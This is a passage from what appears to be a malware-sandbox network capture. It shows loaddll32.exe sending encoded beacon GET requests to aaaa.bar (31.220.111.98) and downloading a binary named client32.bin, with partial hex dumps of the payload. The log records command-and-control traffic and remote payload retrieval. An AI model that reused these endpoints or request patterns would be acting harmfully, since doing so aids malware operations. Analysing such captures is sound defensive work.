10         | 192.168.2.5 | 49952       | 31.220.111.98  | 443              | C:\Windows\System32\loaddll32.exe

Timestamp               | kBytes transferred | Direction | Data
2021-10-20 13:12:02 UTC | 113                | OUT       | GET /jdraw/v6MBuMp_2/FbQ1ciPPyCG2FcgWXCEw/4p6JWEqOHqaqqmtUZlW/iZ4hp74waYQa3SoGGuOho1/ovuxQrp7KsWgS/wBggvPBS/iWInt5CFnJyvSqpyHgJyYxn/O_2F_2BUYe/fLDTk5RpDf_2F9mZ_/2F7NAIxeGgZa/QcsaY21TZZx/U7QIv9qlBRWqpg/DR61HU_2FzqgxKP2wonEs/EkSZK.crw HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
    Host: aaaa.bar
    Connection: Keep-Alive
    Cache-Control: no-cache
2021-10-20 13:12:03 UTC | 114                | IN        | HTTP/1.1 200 OK
    Server: nginx/1.10.3 (Ubuntu)
    Date: Wed, 20 Oct 2021 13:12:02 GMT
    Content-Type: application/zip
    Content-Length: 178758
    Connection: close
    X-Powered-By: PHP/5.4.16
    Set-Cookie: PHPSESSID=al703vnk3gvkbspp3p283jhcg4; path=/; domain=.aaaa.bar
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: public
    Pragma: no-cache
    Set-Cookie: lang=en; expires=Fri, 19-Nov-2021 13:12:03 GMT; path=/; domain=.aaaa.bar
    Content-Transfer-Encoding: Binary
    Content-Disposition: attachment; filename=client32.bin


Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
11         | 192.168.2.5 | 49954       | 31.220.111.98  | 443              | C:\Windows\System32\loaddll32.exe

Timestamp               | kBytes transferred | Direction | Data
2021-10-20 13:12:02 UTC | 114                | OUT       | GET /jdraw/5EykzOMH8AC5xhH2f/h8YTRIF2mRSj/KI86vZ_2Fir/d_2FuekCCAOUjf/zFWcX3e13Ac_2BX_2BJGA/HUhc5yQiyPXedVM9/FyaB9AafT7f6pn1/rx17UyN0GmK2igoXTb/2p_2Bsvx3/fo8we1bgw6ZsfyAC6K72/DEX9YIVMXwvcSkZsNZR/8w9U8utAyGo407eExfiyfi/bLDkUZuz9hmdJ/XGInYyFxli4cy/JoKC.crw HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
    Host: aaaa.bar
    Connection: Keep-Alive
    Cache-Control: no-cache
2021-10-20 13:12:03 UTC | 130                | IN        | HTTP/1.1 200 OK
    Server: nginx/1.10.3 (Ubuntu)
    Date: Wed, 20 Oct 2021 13:12:02 GMT
    Content-Type: application/zip
    Content-Length: 178758
    Connection: close
    X-Powered-By: PHP/5.4.16
    Set-Cookie: PHPSESSID=lsnqfh754hfkcfkt83tqpqmdf3; path=/; domain=.aaaa.bar
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: public
    Pragma: no-cache
    Set-Cookie: lang=en; expires=Fri, 19-Nov-2021 13:12:03 GMT; path=/; domain=.aaaa.bar
    Content-Transfer-Encoding: Binary
    Content-Disposition: attachment; filename=client32.bin


                                                              Session ID: 12
                                                              Source IP: 192.168.2.5
                                                              Source Port: 49960
                                                              Destination IP: 31.220.111.98
                                                              Destination Port: 443
                                                              Process: C:\Windows\System32\loaddll32.exe
                                                              Timestamp | kBytes transferred | Direction | Data
                                                              2021-10-20 13:12:05 UTC | 464 | OUT | GET /jdraw/34E0B5g64GhF/3XPDxs0lbMy/bqW9ARMnbt0tkT/D8MYNhHmIu3qZwQWjO72P/RY9TfewXOKIHe_2B/ce4ORl02hRz9Esp/_2BVvpIh9LurZ83S_2/B0O2_2FdR/gIrNQT1mMUiZ_2BS_2BT/MDTnU5RczKhEBmBWqGJ/EyrDp1_2FuqKMBIze3vzAt/t9EP4e8z_2FDf/kKFLZbmvwAVEbK/QjYP.crw HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                              Host: aaaa.bar
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              Cookie: PHPSESSID=al703vnk3gvkbspp3p283jhcg4; lang=en
                                                              2021-10-20 13:12:06 UTC | 465 | IN | HTTP/1.1 200 OK
                                                              Server: nginx/1.10.3 (Ubuntu)
                                                              Date: Wed, 20 Oct 2021 13:12:05 GMT
                                                              Content-Type: application/zip
                                                              Content-Length: 227913
                                                              Connection: close
                                                              X-Powered-By: PHP/5.4.16
                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                              Cache-Control: public
                                                              Pragma: no-cache
                                                              Content-Transfer-Encoding: Binary
                                                              Content-Disposition: attachment; filename=client32.bin
                                                              2021-10-20 13:12:06 UTC466INData Raw: 7a d8 e7 e8 5a b1 41 33 b2 bc 98 a1 2d 68 13 0f 97 e9 11 38 74 e6 87 20 80 55 24 d2 32 ca b0 b5 fb ef 70 18 d4 d5 42 17 72 8e d5 2f 06 81 8a 8a 11 9a ce 93 c7 7d 46 ec 89 6f b9 08 6e f3 e9 5b bb 4a 79 2d ee 4e f7 bd 61 1f 44 cd 0a f7 36 20 5a 91 04 8e c1 33 8f f7 b1 d2 4e a6 0c 00 cd 68 f5 3a 14 99 e6 2b 34 95 d5 f2 e2 94 d4 0c 25 ae 18 03 78 09 8e f0 c5 6d 1b ab 49 c1 ad 79 81 48 e4 18 22 57 b8 52 0d 2c 28 17 6f a0 8b 55 5f 4b b3 ff 20 9e 5b f8 e2 dd 1a 3f da c4 ce aa 67 12 2e 97 13 2a f0 f8 b1 ff f1 e6 74 f3 a8 1c c9 9e ed 04 cf 21 b7 dc 2c 23 07 33 02 1b f7 d2 cc 06 e3 d7 20 04 e5 45 b7 db 43 76 2e c6 52 d0 4e d3 fe f7 73 59 44 33 b9 94 7e 52 1a 0f 88 95 66 09 0b 79 84 05 4d 1f b8 a4 eb 7b 33 8a 20 c9 4a 1a 36 2a 02 4b 45 ec 8c 07 04 f7 14 d0 74 ce ec
                                                              Data Ascii: zZA3-h8t U$2pBr/}Fon[Jy-NaD6 Z3Nh:+4%xmIyH"WR,(oU_K [?g.*t!,#3 ECv.RNsYD3~RfyM{3 J6*KEt
                                                              2021-10-20 13:12:06 UTC481INData Raw: 2e 4a 31 ca f3 2b be 89 95 34 73 d7 cb 0c 35 50 c4 f1 24 68 8b 88 fc e3 a7 a4 41 86 f8 78 72 ba 2c 90 c1 e3 b3 fd cc d2 05 5c b3 e9 df 42 3a 66 1d 3d 9c 30 db dc 67 7b ab 0a 63 9e 99 3a e3 34 02 9b e3 c3 2a 8e 7b 0a 0e d6 b3 13 54 08 d7 62 5c c8 8a f5 3f 45 1a 48 f9 ef 9c 14 54 a6 b4 3d 2e 56 59 e6 16 5b 29 3c 7b 64 d9 3f 07 fa 80 0a 6a b7 ba 82 65 f6 e2 03 5c 3f 54 5c a2 73 0f 30 1a 81 cf 8b e6 ab e2 01 73 0f 1e 18 75 ad 97 26 cb 15 de 15 d6 48 cb 51 79 8f 3f 63 7b 8f f1 92 43 f0 4f 57 de 6c 4e ad b8 1f f6 47 b9 a2 d8 bc 92 4a 95 19 03 62 3c 8d 67 62 d1 80 db d2 f7 06 37 5c 0f 39 52 04 32 b5 99 20 0e ee 13 87 8f c5 e1 15 23 87 6f d4 a4 3f ae fc ef 14 81 fd fb 27 56 6a a0 df 16 76 77 a2 ca c9 af bc ab 64 2a 89 5d 62 98 bf bb 00 02 3f e2 68 b0 35 6a ef 7e
                                                              Data Ascii: .J1+4s5P$hAxr,\B:f=0g{c:4*{Tb\?EHT=.VY[)<{d?je\?T\s0su&HQy?c{COWlNGJb<gb7\9R2 #o?'Vjvwd*]b?h5j~
                                                              2021-10-20 13:12:06 UTC497INData Raw: 1b c5 c1 52 5d e8 1b 9f 71 ab 0e 0b 8a 06 41 d0 4e b2 cb 38 c5 78 ca 47 e5 5b 37 6b 00 6a a2 3b 43 82 0b 40 3b 9b d6 a7 5c ba 97 be 1f e7 ee af 71 bb 24 48 79 84 77 57 bc ab 4e bb f7 97 e6 e1 0d 53 9e f0 14 bf 31 5d 58 05 68 f2 a0 17 71 1c ad 45 3f ae c8 bc a5 aa 93 eb ba c8 a7 67 ac 5c eb d9 b1 07 eb 5f 17 c0 18 44 0c f2 3d e5 81 b3 8a 93 07 8c a4 fa 37 bc 6f 4c a1 a0 6e 28 50 74 08 0f 4a 51 66 bb b7 f9 2f 6e 3c 71 74 ff d7 8c 9e b5 56 56 9c a7 22 d5 d7 29 76 b5 2e e9 c9 bb bc 74 89 5e 8b 63 a9 b2 5f 63 13 02 9c 34 83 60 13 85 42 2e a4 07 d3 64 e0 bf ec b0 74 b5 5d 30 8f 37 aa b8 eb b6 97 ef d8 c1 41 32 84 02 bf c5 59 16 51 c4 c9 d5 e2 66 32 ef 4b ab 59 9e 90 a0 d8 db c6 fb 78 77 d3 df b2 65 22 a3 66 bb 19 18 43 48 26 2f b4 dc 7b 68 0d 6e 34 d8 2b d0 43
                                                              Data Ascii: R]qAN8xG[7kj;C@;\q$HywWNS1]XhqE?g\_D=7oLn(PtJQf/n<qtVV")v.t^c_c4`B.dt]07A2YQf2KYxwe"fCH&/{hn4+C
                                                              2021-10-20 13:12:06 UTC513INData Raw: 5f 7a 9f 35 09 63 55 53 bb 4b 41 13 f0 91 f8 0a 07 60 7b f7 55 83 b4 a5 17 86 71 27 6b 8d 18 72 f9 43 15 c2 61 8b 60 90 27 e9 c9 13 a2 a0 63 2f 4d 2a 03 5a 41 7f 9f ab 65 f3 69 ce 1b 35 41 db 34 ea eb d6 9d 9f 13 e8 da 77 03 6a d8 e8 da 4f 0b 2b 13 51 a4 96 a7 47 32 59 77 45 0e b9 1f 3f 73 be 78 a0 8b a6 2d 08 2a 52 36 5b 9d ee c1 d3 49 99 23 d5 5b a7 75 83 e2 18 23 e6 f1 ea 0d 54 aa 2d c6 ee 57 34 e5 fb 67 f2 4b 03 93 72 06 90 b3 b6 3e 4b 0d a4 7f 44 69 e4 dc 3f 91 e0 72 6e 51 e4 59 b9 2d 88 6f 71 75 62 c4 aa f8 c6 f9 3f f1 7f cc f0 29 ea 89 7c 41 40 97 26 1c d1 5a 80 46 a4 7e fd 7b 04 0b 75 65 21 25 9a 05 08 e6 80 cc 1a 48 15 cc c7 14 c2 d7 ab bb 00 83 16 00 d3 4e 21 b2 50 29 94 10 54 24 aa c8 23 81 b3 16 c0 fd de fd 17 01 de 7a 04 d1 0f d1 52 69 97 78
                                                              Data Ascii: _z5cUSKA`{Uq'krCa`'c/M*ZAei5A4wjO+QG2YwE?sx-*R6[I#[u#T-W4gKr>KDi?rnQY-oqub?)|A@&ZF~{ue!%HN!P)T$#zRix
                                                              2021-10-20 13:12:06 UTC545INData Raw: f6 dc b3 15 4c d1 14 b8 eb 59 b9 e1 37 08 b7 e2 48 73 d3 5f 58 44 83 57 60 8a b5 ba 46 dd e5 13 b4 4b 9f fa b9 3b 16 57 c6 74 ba b7 ca ae da 55 18 25 a9 61 16 1d 54 de c6 0e 93 ad 72 af 8f 01 7f 9e e5 c2 30 ce 18 65 e9 8d 33 23 21 dd 90 99 be 5a 86 38 60 0a 64 5e c0 3c 9b 98 4a c1 8a ae e6 0b 47 ee 0b ba db c2 e3 cc 1e f2 82 cf 91 7a 59 09 fb 82 ef d3 2c 94 20 0d b3 b6 8e fe fd 12 23 d6 25 d3 1e 4c 5e f8 72 51 3b 5a 5c 95 64 a0 88 22 56 ba 5f d3 14 e8 00 66 ea fb 4f 45 b5 4e 9b 57 cf 89 c4 4e a6 c4 0f dd 04 48 55 f2 4d 05 24 24 c3 51 8a b9 48 c7 c6 d8 f6 c9 af f1 de eb 65 ff 4b 63 c3 ea a4 5d 7b 34 40 46 9d 9a 1f be f2 e5 78 ae 49 25 7f 4a 1c 95 15 02 ba 5f ad 1f 2e 56 d5 e7 19 6f de 86 4e d2 7b 7a de 6d f8 e7 dc 57 f5 23 81 91 3e ab 9d df bf 74 84 26 4b
                                                              Data Ascii: LY7Hs_XDW`FK;WtU%aTr0e3#!Z8`d^<JGzY, #%L^rQ;Z\d"V_fOENWNHUM$$QHeKc]{4@FxI%J_.VoN{zmW#>t&K
                                                              2021-10-20 13:12:07 UTC561INData Raw: 20 bc 07 a2 70 0c ba 65 28 80 61 ab 01 b1 81 37 31 09 a2 a1 66 5c 85 4e 97 ed 5b 95 a8 9f 75 75 3d 68 61 73 f3 9a 62 84 80 1b 83 41 4d a0 6a 3c 97 8b d3 01 45 8e 7d cf 25 76 f8 60 d6 85 04 29 da f2 2a 6a f3 5c 61 19 53 6a e0 54 b4 c8 d0 3d ec b1 f6 a8 41 70 ee a4 81 45 ae cb e4 f8 8e 6b 38 06 eb 05 dd ba 7a af f5 35 93 6b 7d c7 2c 71 20 21 07 81 ac 0b 8d 58 e3 6b 10 c6 50 0f 13 ad a6 a1 48 72 94 7d dd ce 69 16 50 6f 88 bb 55 6f 6c 31 8b ed e7 4b ea a0 cf 38 71 e4 0c f9 89 79 21 01 d8 34 b9 1e 5e 00 38 24 6b ea be e2 59 48 44 b1 52 cd b1 4b f0 70 a9 f8 5e 59 be b8 eb c3 7f 82 9c 9a ff 12 47 93 09 c4 42 ba 07 90 86 13 79 cd e1 4f f3 2c cf e3 13 d4 63 f4 a7 c6 57 a3 a5 9b 80 40 43 ce 8d 9b eb 6e bd f6 db 92 35 b5 45 df 08 5a f2 df 84 f0 c2 9c 93 80 35 01 c8
                                                              Data Ascii: pe(a71f\N[uu=hasbAMj<E}%v`)*j\aSjT=ApEk8z5k},q !XkPHr}iPoUol1K8qy!4^8$kYHDRKp^YGByO,cW@Cn5EZ5
                                                              2021-10-20 13:12:07 UTC577INData Raw: 3b 57 ae 94 64 e1 a2 2f 21 c8 68 fe 83 e9 c0 cc a5 b4 7d ed a7 76 49 ee 30 ac 0d 6b 83 8d 7e 8c ee f8 05 a7 b8 0d 28 e8 9f 3a fb 0b 38 bd fc e6 f8 a1 f9 86 52 ed 92 14 e5 a5 bb 73 24 43 0c 32 6b e9 a3 3e 89 f9 40 7e 69 90 4b b7 6a bf 9b fa 8c e4 ad 3a 20 45 36 5a 03 e0 ff 57 aa de 5d 27 4d 6d f8 a4 95 ae 49 02 c3 28 03 59 cd e3 fc e9 10 ac 2e 39 9c 64 22 3e 5a c2 81 57 11 29 68 0c 61 51 2f dd c5 b5 77 8f 31 ac 3c 48 aa 79 78 74 63 5c da a6 49 bc d2 39 01 f1 0f bb c2 f6 2a 5f 28 b1 0d 45 ca e9 dd 2c 23 c9 61 c2 45 e8 64 1d 29 cb b1 f7 70 c4 6d 0b 74 3d 1a 6f 20 e9 67 f2 6c 6a 67 15 27 d6 86 19 bf d1 31 31 15 ca c2 e1 0d 22 f6 cd 34 a4 87 47 81 23 7c 06 aa db 60 22 7b 5d 59 df 70 e6 8f 80 70 c9 d4 2e 2f 22 98 bb ad 88 cb b3 3b b0 11 09 ab 1a f3 75 16 9d 3b
                                                              Data Ascii: ;Wd/!h}vI0k~(:8Rs$C2k>@~iKj: E6ZW]'MmI(Y.9d">ZW)haQ/w1<Hyxtc\I9*_(E,#aEd)pmt=o gljg'11"4G#|`"{]Ypp./";u;
                                                              2021-10-20 13:12:07 UTC625INData Raw: f4 45 5b 10 5c 2d 4f 1a 90 46 e3 a0 a3 5d 2e e4 27 e6 81 b2 37 f3 fe f5 c0 cb e2 5a 0c 85 c8 56 8d 72 ef 1d 40 1f bd 5e 9f e2 2c 58 0d ce 81 8d 68 22 f1 3e be b1 ce 56 8e 96 ed 7f cb 93 2f c6 da 16 3f 14 29 1e 69 9f ec 31 e0 23 9a 44 94 ef 4b d8 d0 c1 08 99 69 29 c8 2a 18 90 5d 29 c6 d0 cf 66 66 b7 01 05 60 0b 83 1a 6d f9 a0 1d a2 2d 4d a8 5e fc 38 c5 9e 05 82 09 de 00 4f b7 73 ea fb 72 8c cf 67 11 83 58 16 68 e5 c9 91 0f c6 ab 3c ca b1 6f a4 bf 65 e6 a9 54 f6 5c e5 52 58 a3 47 c0 29 a5 02 3c 26 7e 71 87 43 db e8 e3 12 c2 56 f4 e8 c1 a2 78 c5 10 65 40 9f cb f9 f8 c9 72 03 b4 6e 95 83 be c1 6e 77 9d 2a 24 bb 73 49 27 db 0a 07 10 9c 66 19 ba ea 00 22 f3 19 53 e4 a1 e4 9f 83 db a8 a6 ea 07 ec 20 6f 87 4f c8 0a 75 cc cc e6 2d fd 2d de 8a 1a 29 f7 1e 23 9e 84
                                                              Data Ascii: E[\-OF].'7ZVr@^,Xh">V/?)i1#DKi)*])ff`m-M^8OsrgXh<oeT\RXG)<&~qCVxe@rnnw*$sI'f"S oOu--)#
                                                              2021-10-20 13:12:07 UTC657INData Raw: b0 34 69 ae f2 ed 91 62 cf 4c f2 04 e4 81 46 be 40 88 33 ea 12 7f 56 54 38 6e db 40 6d 51 a2 77 ae 02 c6 38 fe 95 2b 17 d7 46 6d 99 c8 3d a7 24 23 10 19 04 2e 3f b8 3d 3c 61 b3 75 82 a1 db 73 32 a3 ba 8c 74 19 28 b4 61 32 ce 18 c2 a7 b8 29 64 f0 59 ea 32 6e 80 1c e4 08 95 08 11 60 54 47 4f 6e a4 5c 7e 63 6d 92 07 c8 8d 02 05 b3 5f 8e 4d dd 31 80 60 af 08 f7 83 2a 1c 25 60 d0 f5 0d dc 79 5d 9d f6 32 fa 40 07 f0 0d a6 f3 a4 7c 6e 95 c0 37 0f b2 f6 fd 4c a0 42 ea 19 f4 58 ae dd 23 9b f7 bb d5 6f 0c 63 d1 92 98 60 b3 c4 66 10 04 d9 51 49 7c 5e 2a 52 89 d4 a2 1a ee db f4 56 d6 53 c7 b3 05 c1 44 71 f4 45 8a b0 67 98 7d 76 d2 c0 e9 48 78 c3 e4 75 71 8b 47 b9 c0 41 8a 1c 15 d7 33 95 c1 46 41 8d 8f bd b8 6b 7c 5d 0b 00 3c fb f4 92 c9 be 97 92 fc 29 98 dc 54 40 51
                                                              Data Ascii: 4ibLF@3VT8n@mQw8+Fm=$#.?=<aus2t(a2)dY2n`TGOn\~cm_M1`*%`y]2@|n7LBX#oc`fQI|^*RVSDqEg}vHxuqGA3FAk|]<)T@Q
                                                              2021-10-20 13:12:07 UTC673INData Raw: a6 7e c3 d7 27 38 80 6d 49 5d ad 80 7b 43 c3 fc 9a 87 9f 53 3a b7 14 15 97 8a 69 87 72 bc 3c a7 88 1e 34 ff 0e d6 ba 8e 0f 5d 42 b0 9a d6 48 bf 3d 19 e5 d6 3e 7b 3b 5f 5e b8 5d 9f a4 ac b0 8e a3 bb e9 89 1e 98 f2 24 ce 4f d6 42 b4 09 c7 14 65 d4 28 df 25 8d fd 27 a5 fc 9a 08 3c 41 73 ca 7e 2c b9 b3 10 20 d0 50 ad 19 1f 23 a0 13 9c 55 b8 30 b4 ed e3 06 18 78 7c 56 12 8e 4d dd 81 ab 9f 21 dc b1 8a 1e aa 8d 1b d5 4b e4 66 9c c8 fc 23 e2 16 65 0f 60 75 d1 21 8f 15 4e 4c 9f ef 63 22 84 4b 27 19 d0 65 1c ff c0 40 8f 76 82 c9 84 e6 0c 61 f7 d3 32 8a 48 e6 f8 d6 8c 63 4a 68 b4 7b 5e bd f8 69 f6 a9 61 13 bf 1a 14 4d 37 04 c2 f8 f3 78 71 1f 87 78 1c ed ae 8f 85 45 7e a4 e4 9f 1d be 25 ea 73 b0 1c 81 9b ee 91 31 b2 97 03 2f 7c b8 3e 09 86 68 f0 fe 0c 26 42 85 4a 1a
                                                              Data Ascii: ~'8mI]{CS:ir<4]BH=>{;_^]$OBe(%'<As~, P#U0x|VM!Kf#e`u!NLc"K'e@va2HcJh{^iaM7xqxE~%s1/|>h&BJ
                                                              2021-10-20 13:12:07 UTC689INData Raw: ad e0 d1 12 29 22 49 f9 a7 34 97 6f 16 37 a2 81 a9 13 85 99 88 2d b8 18 ed ea 94 02 b8 22 70 88 0c 4e 0e 1b 00 37 07 5d 64 37 f1 6a 4c 38 7a f2 3a 1b 46 ef 40 57 8c e1 17 93 3c a3 4b 92 85 6a 10 e7 3f 00 44 98 2b c3 fa ee 7f 6b 37 fb da 91 35 cf 6a 80 66 60 87 9f 24 9d 96 42 04 c0 b3 9a 33 cc 61 ca 16 f3 ed e7 ea a7 3a 20 0f e8 34 ed 80 fe f9 c1 74 5d e2 f9 4a 63 04 d3 49 a0 05 0a f8 4a d1 0a 90 61 6a 78 cd d8 d0 bd e8 5d 41 37 ce 31 6a 1a 93 62 b6 40 78 c3 39 a0 e3 b5 1d 16 c7 a4 52 64 c1 a1 86 59 17 c6 04 73 90 dc 81 c5 b8 85 f8 c8 87 c0 a5 92 a0 ed 29 c2 60 be 4c e0 e9 2e 7b 3f fd 5b 0f a7 d8 d8 2b 82 e3 60 b6 29 35 2b 35 eb de 6d d5 5b 09 af 1e 19 62 3c c6 34 06 bb 37 e1 4c c6 d5 6a 0c e7 7e d4 bc 17 02 40 74 1f 2d 3c fc d2 07 5e 59 fc 92 9e d4 c9 59
                                                              Data Ascii: )"I4o7-"pN7]d7jL8z:F@W<Kj?D+k75jf`$B3a: 4t]JcIJajx]A71jb@x9RdYs)`L.{?[+`)5+5m[b<47Lj~@t-<^YY
                                                              2021-10-20 13:12:07 UTC721INData Raw: 1d 15 22 2b 66 85 73 55 9e f6 5d a8 ee ce a7 ad e3 06 87 85 cc aa 6b f2 42 fd 2e 71 66 12 47 8e 4f 20 98 f2 f2 2f c8 e4 86 04 6d 89 5a 47 41 b4 c5 b3 2c b5 72 11 ed ba 4a 11 d8 c5 78 7a 07 5e 3a 35 5b 79 1b ea f0 cd 1c 51 ca d6 3f 7c 2a 83 33 78 ea f8 a1 d2 53 56 01 d8 bc f0 70 e3 c7 56 d1 49 7c 69 88 45 fd 9e f8 75 51 b3 6b 86 60 ec 24 61 d5 01 53 f6 dd 5f d0 fc 4a c2 a4 a7 9a e1 19 6e 91 30 ef 70 fc 6b 93 3c 90 c8 f6 19 fc a6 ce fc 4e 06 d6 48 8f d3 2d 9d 12 97 9d 2e cb d0 0f ee c6 9c 88 05 10 81 d9 1b 82 d6 24 26 e5 f9 81 16 d7 c4 21 f4 8d 80 59 6e 21 72 a1 30 24 dc 56 eb 1e c2 33 72 fe 43 94 d6 f7 89 b8 f9 c0 bd e3 2a fb 80 da 0f a1 ff 1d 43 89 84 1a b5 ef f5 db bc e9 79 91 d6 80 6d 40 24 9f 96 b2 01 78 4a 45 bf 58 84 4b 5e 45 41 b6 5b 47 0d e4 3b e4
                                                              Data Ascii: "+fsU]kB.qfGO /mZGA,rJxz^:5[yQ?|*3xSVpVI|iEuQk`$aS_Jn0pk<NH-.$&!Yn!r0$V3rC*Cym@$xJEXK^EA[G;
                                                              2021-10-20 13:12:07 UTC737INData Raw: 2e fb d7 0d cb 00 dd e6 64 4f 12 08 ca b5 65 15 ea dd 61 cf 59 a0 04 52 6d 3a 86 4a 5c 6f 3c 6c 28 15 af b6 d0 89 01 51 da 89 16 c7 3c 79 9b 77 68 ca cd 8c 91 5e f7 6f 51 58 f6 11 eb 66 c3 96 07 b5 3c 1f 26 a5 27 0a 26 66 13 20 26 1e ed 1f 1e 48 82 7f 31 c3 3e 11 2e 36 52 61 d9 12 a3 8a 5b d8 ad 2e eb c4 f5 02 a5 f3 57 48 23 3e e2 49 bc 1c 72 e8 1d 42 34 84 0c e4 4b 29 19 0d 98 88 d1 f8 85 30 f5 bc 13 32 3e d8 76 cb 37 60 de ac 31 9d bc c1 16 d8 ea 49 2d d5 70 d8 18 86 1a c3 e6 5c b3 d0 15 54 d4 a9 76 e7 43 90 50 a7 09 85 d6 8b 54 00 3d d6 c1 cd 33 e9 99 9b 62 8d 0b 61 48 63 fd 51 68 59 24 9e e2 b2 37 dd ce 4a 4e ba 5e 02 84 db 7f 49 bd a1 c0 de 66 e3 69 a4 1f 2a 0c 67 99 85 fb 24 98 b2 ab 69 af 8e 8c 62 79 8c 0c 4b d4 5d 7a 2f 03 f4 f8 ac 01 36 31 ab 4a
                                                              Data Ascii: .dOeaYRm:J\o<l(Q<ywh^oQXf<&'&f &H1>.6Ra[.WH#>IrB4K)02>v7`1I-p\TvCPT=3baHcQhY$7JN^Ifi*g$ibyK]z/61J
                                                              2021-10-20 13:12:07 UTC753INData Raw: 9a fa 62 32 5e b9 ab 85 b9 ab 50 c2 4a 8f c4 09 06 ae d5 bc 3a f3 8f f0 af d1 30 0b 9a cf 47 a5 60 5a 9d a6 b3 f3 db df 96 f0 20 0d a5 af d2 f4 64 bd 31 f5 be 5d f3 c5 fa 96 bb b3 a5 6d de cc 0b f5 bf 50 97 43 de 4f 1a 6d 46 32 20 ed 70 40 f0 8e 52 f1 9b a7 17 20 51 75 c9 52 f0 df 6f 73 c6 07 1d 2a 25 36 cb 2a 6f 45 b8 56 ed 01 4a f2 36 7a e4 02 b6 48 2f 27 9c 06 4a 19 1f 1d 07 33 7c 4d d9 28 2c 7d 74 84 5c 11 7c 58 97 9d 6a ab dd eb d2 6c d9 06 63 cc 3e 4a da c1 53 67 47 fc ef 52 94 5a 60 47 3b a9 3c 3b 31 a2 8e 39 86 a6 02 7d 89 e6 27 f4 64 49 f4 28 0e 30 dc 0c 71 0c 45 b0 da 9e ea 87 8e 11 ac 2c 22 ca 4e 8d 3f ae 3f 71 19 52 29 a0 82 9e 3b eb db c6 1e bf e9 4e b1 8b 87 d5 1f 14 a3 8a 84 41 34 77 05 fa 28 d8 dd ef 95 86 ec 0f 8d cb 65 0c f0 72 f7 2a fa
                                                              Data Ascii: b2^PJ:0G`Z d1]mPCOmF2 p@R QuRos*%6*oEVJ6zH/'J3|M(,}t\|Xjlc>JSgGRZ`G;<;19}'dI(0qE,"N??qR);NA4w(er*


                                                              Session ID: 13
                                                              Source IP: 192.168.2.5
                                                              Source Port: 49961
                                                              Destination IP: 31.220.111.98
                                                              Destination Port: 443
                                                              Process: C:\Windows\System32\loaddll32.exe
                                                              Timestamp | kBytes transferred | Direction | Data
                                                              2021-10-20 13:12:05 UTC | 465 | OUT | GET /jdraw/MVdZIiu0NzX64W/jGgxHg6bC6YiiTOGCL_2B/K5_2B4OguOIrq_2F/deq5LFM1_2Fh_2B/A30hkj4LBKS8PnjdwI/9w5zD21KD/Gv4zCmpHpXW8kBPJ6yzJ/GKf4n1QcwBRAhkvF2a_/2BDpnBrAV7AZvGg_2FwtGG/RaDUbMye7jqhn/NmN4Vf9F/bD7myyGQXfiKlv1_2BoXKI7/VLTDzeWG/dZ.crw HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                              Host: aaaa.bar
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              Cookie: lang=en; PHPSESSID=lsnqfh754hfkcfkt83tqpqmdf3
                                                              2021-10-20 13:12:06 UTC | 529 | IN | HTTP/1.1 200 OK
                                                              Server: nginx/1.10.3 (Ubuntu)
                                                              Date: Wed, 20 Oct 2021 13:12:05 GMT
                                                              Content-Type: application/zip
                                                              Content-Length: 227913
                                                              Connection: close
                                                              X-Powered-By: PHP/5.4.16
                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                              Cache-Control: public
                                                              Pragma: no-cache
                                                              Content-Transfer-Encoding: Binary
                                                              Content-Disposition: attachment; filename=client32.bin
                                                              2021-10-20 13:12:06 UTC530INData Raw: 7a d8 e7 e8 5a b1 41 33 b2 bc 98 a1 2d 68 13 0f 97 e9 11 38 74 e6 87 20 80 55 24 d2 32 ca b0 b5 fb ef 70 18 d4 d5 42 17 72 8e d5 2f 06 81 8a 8a 11 9a ce 93 c7 7d 46 ec 89 6f b9 08 6e f3 e9 5b bb 4a 79 2d ee 4e f7 bd 61 1f 44 cd 0a f7 36 20 5a 91 04 8e c1 33 8f f7 b1 d2 4e a6 0c 00 cd 68 f5 3a 14 99 e6 2b 34 95 d5 f2 e2 94 d4 0c 25 ae 18 03 78 09 8e f0 c5 6d 1b ab 49 c1 ad 79 81 48 e4 18 22 57 b8 52 0d 2c 28 17 6f a0 8b 55 5f 4b b3 ff 20 9e 5b f8 e2 dd 1a 3f da c4 ce aa 67 12 2e 97 13 2a f0 f8 b1 ff f1 e6 74 f3 a8 1c c9 9e ed 04 cf 21 b7 dc 2c 23 07 33 02 1b f7 d2 cc 06 e3 d7 20 04 e5 45 b7 db 43 76 2e c6 52 d0 4e d3 fe f7 73 59 44 33 b9 94 7e 52 1a 0f 88 95 66 09 0b 79 84 05 4d 1f b8 a4 eb 7b 33 8a 20 c9 4a 1a 36 2a 02 4b 45 ec 8c 07 04 f7 14 d0 74 ce ec
                                                              Data Ascii: zZA3-h8t U$2pBr/}Fon[Jy-NaD6 Z3Nh:+4%xmIyH"WR,(oU_K [?g.*t!,#3 ECv.RNsYD3~RfyM{3 J6*KEt
